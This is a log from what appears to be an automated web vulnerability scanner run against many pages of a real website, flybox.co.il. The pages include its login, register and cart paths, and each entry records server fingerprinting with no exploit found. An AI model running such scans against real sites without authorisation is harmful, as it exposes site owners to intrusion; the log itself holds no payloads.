- [1;37m|_[ + ] [[1;37m 8 / 100 [1;37m][0;37m-[05:18:40][1;37m [ - ] [0m
- [1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/terms/[1;37m ][0m
- [1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
- [1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 302 Found, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
- [1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
- [1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
- [1;37m
- [1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
- [1;37m|_[ + ] [[1;37m 9 / 100 [1;37m][0;37m-[05:18:40][1;37m [ - ] [0m
- [1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/faq/[1;37m ][0m
- [1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
- [1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 302 Found, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
- [1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
- [1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
- [1;37m
- [1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
- [1;37m|_[ + ] [[1;37m 10 / 100 [1;37m][0;37m-[05:18:41][1;37m [ - ] [0m
- [1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/instructors/[1;37m ][0m
- [1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
- [1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 302 Found, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
- [1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
- [1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
- [1;37m
- [1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
- [1;37m|_[ + ] [[1;37m 11 / 100 [1;37m][0;37m-[05:18:42][1;37m [ - ] [0m
- [1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/personal_details/[1;37m ][0m
- [1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
- [1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 302 Found, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
- [1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
- [1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
- [1;37m
- [1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
- [1;37m|_[ + ] [[1;37m 12 / 100 [1;37m][0;37m-[05:18:43][1;37m [ - ] [0m
- [1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/en/terms/[1;37m ][0m
- [1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
- [1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
- [1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
- [1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
- [1;37m
- [1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
- [1;37m|_[ + ] [[1;37m 13 / 100 [1;37m][0;37m-[05:18:44][1;37m [ - ] [0m
- [1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/en/restaurant/[1;37m ][0m
- [1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
- [1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
- [1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
- [1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
- [1;37m
- [1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
- [1;37m|_[ + ] [[1;37m 14 / 100 [1;37m][0;37m-[05:18:45][1;37m [ - ] [0m
- [1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/en/kids/[1;37m ][0m
- [1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
- [1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
- [1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
- [1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
- [1;37m
- [1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
- [1;37m|_[ + ] [[1;37m 15 / 100 [1;37m][0;37m-[05:18:45][1;37m [ - ] [0m
- [1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/×€×××××קס-×תקש×ךת/[1;37m ][0m
- [1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
- [1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 302 Found, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
- [1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
- [1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
- [1;37m
- [1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
- [1;37m|_[ + ] [[1;37m 16 / 100 [1;37m][0;37m-[05:18:46][1;37m [ - ] [0m
- [1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/social-events/[1;37m ][0m
- [1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
- [1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 302 Found, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
- [1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
- [1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
- [1;37m
- [1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
- [1;37m|_[ + ] [[1;37m 17 / 100 [1;37m][0;37m-[05:18:47][1;37m [ - ] [0m
- [1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/en/personal_details/[1;37m ][0m
- [1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
- [1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
- [1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
- [1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
- [1;37m
- [1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
- [1;37m|_[ + ] [[1;37m 18 / 100 [1;37m][0;37m-[05:18:48][1;37m [ - ] [0m
- [1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/parties-events/[1;37m ][0m
- [1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
- [1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 302 Found, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
- [1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
- [1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
- [1;37m
- [1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
- [1;37m|_[ + ] [[1;37m 19 / 100 [1;37m][0;37m-[05:18:49][1;37m [ - ] [0m
- [1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/en/××_××××_××¢××£/[1;37m ][0m
- [1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
- [1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
- [1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
- [1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
- [1;37m
- [1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
- [1;37m|_[ + ] [[1;37m 20 / 100 [1;37m][0;37m-[05:18:51][1;37m [ - ] [0m
- [1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/en/events/[1;37m ][0m
- [1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
- [1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
- [1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
- [1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
- [1;37m
- [1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
- [1;37m|_[ + ] [[1;37m 21 / 100 [1;37m][0;37m-[05:18:52][1;37m [ - ] [0m
- [1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/en/××××/[1;37m ][0m
- [1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
- [1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
- [1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
- [1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
- [1;37m
- [1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
- [1;37m|_[ + ] [[1;37m 22 / 100 [1;37m][0;37m-[05:18:54][1;37m [ - ] [0m
- [1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/en/faq/[1;37m ][0m
- [1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
- [1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
- [1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
- [1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
- [1;37m
- [1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
- [1;37m|_[ + ] [[1;37m 23 / 100 [1;37m][0;37m-[05:18:55][1;37m [ - ] [0m
- [1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/en/×ק׊××¢× ××/[1;37m ][0m
- [1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
- [1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
- [1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
- [1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
- [1;37m
- [1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
- [1;37m|_[ + ] [[1;37m 24 / 100 [1;37m][0;37m-[05:18:57][1;37m [ - ] [0m
- [1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/en/instructors/[1;37m ][0m
- [1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
- [1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
- [1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
- [1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
- [1;37m
- [1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
- [1;37m|_[ + ] [[1;37m 25 / 100 [1;37m][0;37m-[05:18:57][1;37m [ - ] [0m
- [1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/gift-packages/[1;37m ][0m
- [1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
- [1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 302 Found, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
- [1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
- [1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
- [1;37m
- [1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
- [1;37m|_[ + ] [[1;37m 26 / 100 [1;37m][0;37m-[05:18:58][1;37m [ - ] [0m
- [1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/en/parties-events/[1;37m ][0m
- [1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
- [1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
- [1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
- [1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
- [1;37m
- [1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
- [1;37m|_[ + ] [[1;37m 27 / 100 [1;37m][0;37m-[05:18:59][1;37m [ - ] [0m
- [1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/ש××ך××/[1;37m ][0m
- [1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
- [1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 302 Found, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
- [1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
- [1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
- [1;37m
- [1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
- [1;37m|_[ + ] [[1;37m 28 / 100 [1;37m][0;37m-[05:18:59][1;37m [ - ] [0m
- [1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/cart/[1;37m ][0m
- [1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
- [1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 302 Found, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
- [1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
- [1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
- [1;37m
- [1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
- [1;37m|_[ + ] [[1;37m 29 / 100 [1;37m][0;37m-[05:19:00][1;37m [ - ] [0m
- [1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/logbook/[1;37m ][0m
- [1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
- [1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 302 Found, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
- [1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
- [1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
- [1;37m
- [1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
- [1;37m|_[ + ] [[1;37m 30 / 100 [1;37m][0;37m-[05:19:01][1;37m [ - ] [0m
- [1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/personal_details_coupon/[1;37m ][0m
- [1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
- [1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 302 Found, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
- [1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
- [1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
- [1;37m
- [1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
- [1;37m|_[ + ] [[1;37m 31 / 100 [1;37m][0;37m-[05:19:01][1;37m [ - ] [0m
- [1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/register/[1;37m ][0m
- [1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
- [1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 302 Found, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
- [1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
- [1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
- [1;37m
- [1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
- [1;37m|_[ + ] [[1;37m 32 / 100 [1;37m][0;37m-[05:19:02][1;37m [ - ] [0m
- [1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/תע××€×-×תק××ת-××ך××¢××/[1;37m ][0m
- [1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
- [1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 302 Found, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
- [1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
- [1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
- [1;37m
- [1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
- [1;37m|_[ + ] [[1;37m 33 / 100 [1;37m][0;37m-[05:19:02][1;37m [ - ] [0m
- [1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/login/[1;37m ][0m
- [1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
- [1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 302 Found, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
- [1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
- [1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
- [1;37m
- [1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
- [1;37m|_[ + ] [[1;37m 34 / 100 [1;37m][0;37m-[05:19:03][1;37m [ - ] [0m
- [1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/en/×€×××××קס-×תקש×ךת/[1;37m ][0m
- [1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
- [1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
- [1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
- [1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
- [1;37m
- [1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
- [1;37m|_[ + ] [[1;37m 35 / 100 [1;37m][0;37m-[05:19:03][1;37m [ - ] [0m
- [1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/blog/[1;37m ][0m
- [1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
- [1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 302 Found, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
- [1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
- [1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
- [1;37m
- [1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
- [1;37m|_[ + ] [[1;37m 36 / 100 [1;37m][0;37m-[05:19:04][1;37m [ - ] [0m
- [1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/forgot/[1;37m ][0m
- [1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
- [1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 302 Found, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
- [1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
- [1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
- [1;37m
- [1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
- [1;37m|_[ + ] [[1;37m 37 / 100 [1;37m][0;37m-[05:19:04][1;37m [ - ] [0m
- [1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/health/[1;37m ][0m
- [1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
- [1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 302 Found, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
- [1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
- [1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
- [1;37m
- [1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
- [1;37m|_[ + ] [[1;37m 38 / 100 [1;37m][0;37m-[05:19:04][1;37m [ - ] [0m
- [1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/ך×׊××-××¢××£-ש××/[1;37m ][0m
- [1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
- [1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 302 Found, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
- [1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
- [1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
- [1;37m
- [1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
- [1;37m|_[ + ] [[1;37m 39 / 100 [1;37m][0;37m-[05:19:06][1;37m [ - ] [0m
- [1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/en/gift-packages/[1;37m ][0m
- [1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
- [1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
- [1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
- [1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
- [1;37m
- [1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
- [1;37m|_[ + ] [[1;37m 40 / 100 [1;37m][0;37m-[05:19:06][1;37m [ - ] [0m
- [1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/contact/[1;37m ][0m
- [1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
- [1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 302 Found, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
- [1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
- [1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
- [1;37m
- [1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
- [1;37m|_[ + ] [[1;37m 41 / 100 [1;37m][0;37m-[05:19:07][1;37m [ - ] [0m
- [1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/unsubsribe/[1;37m ][0m
- [1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
- [1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 302 Found, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
- [1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
- [1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
- [1;37m
- [1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
- [1;37m|_[ + ] [[1;37m 42 / 100 [1;37m][0;37m-[05:19:08][1;37m [ - ] [0m
- [1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/en/social-events/[1;37m ][0m
- [1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
- [1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
- [1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
- [1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
- [1;37m
- [1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
- [1;37m|_[ + ] [[1;37m 43 / 100 [1;37m][0;37m-[05:19:08][1;37m [ - ] [0m
- [1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/packages/[1;37m ][0m
- [1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
- [1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 302 Found, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
- [1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
- [1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
- [1;37m
- [1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
- [1;37m|_[ + ] [[1;37m 44 / 100 [1;37m][0;37m-[05:19:09][1;37m [ - ] [0m
- [1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/upsells/[1;37m ][0m
- [1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
- [1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 302 Found, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
- [1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
- [1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
- [1;37m
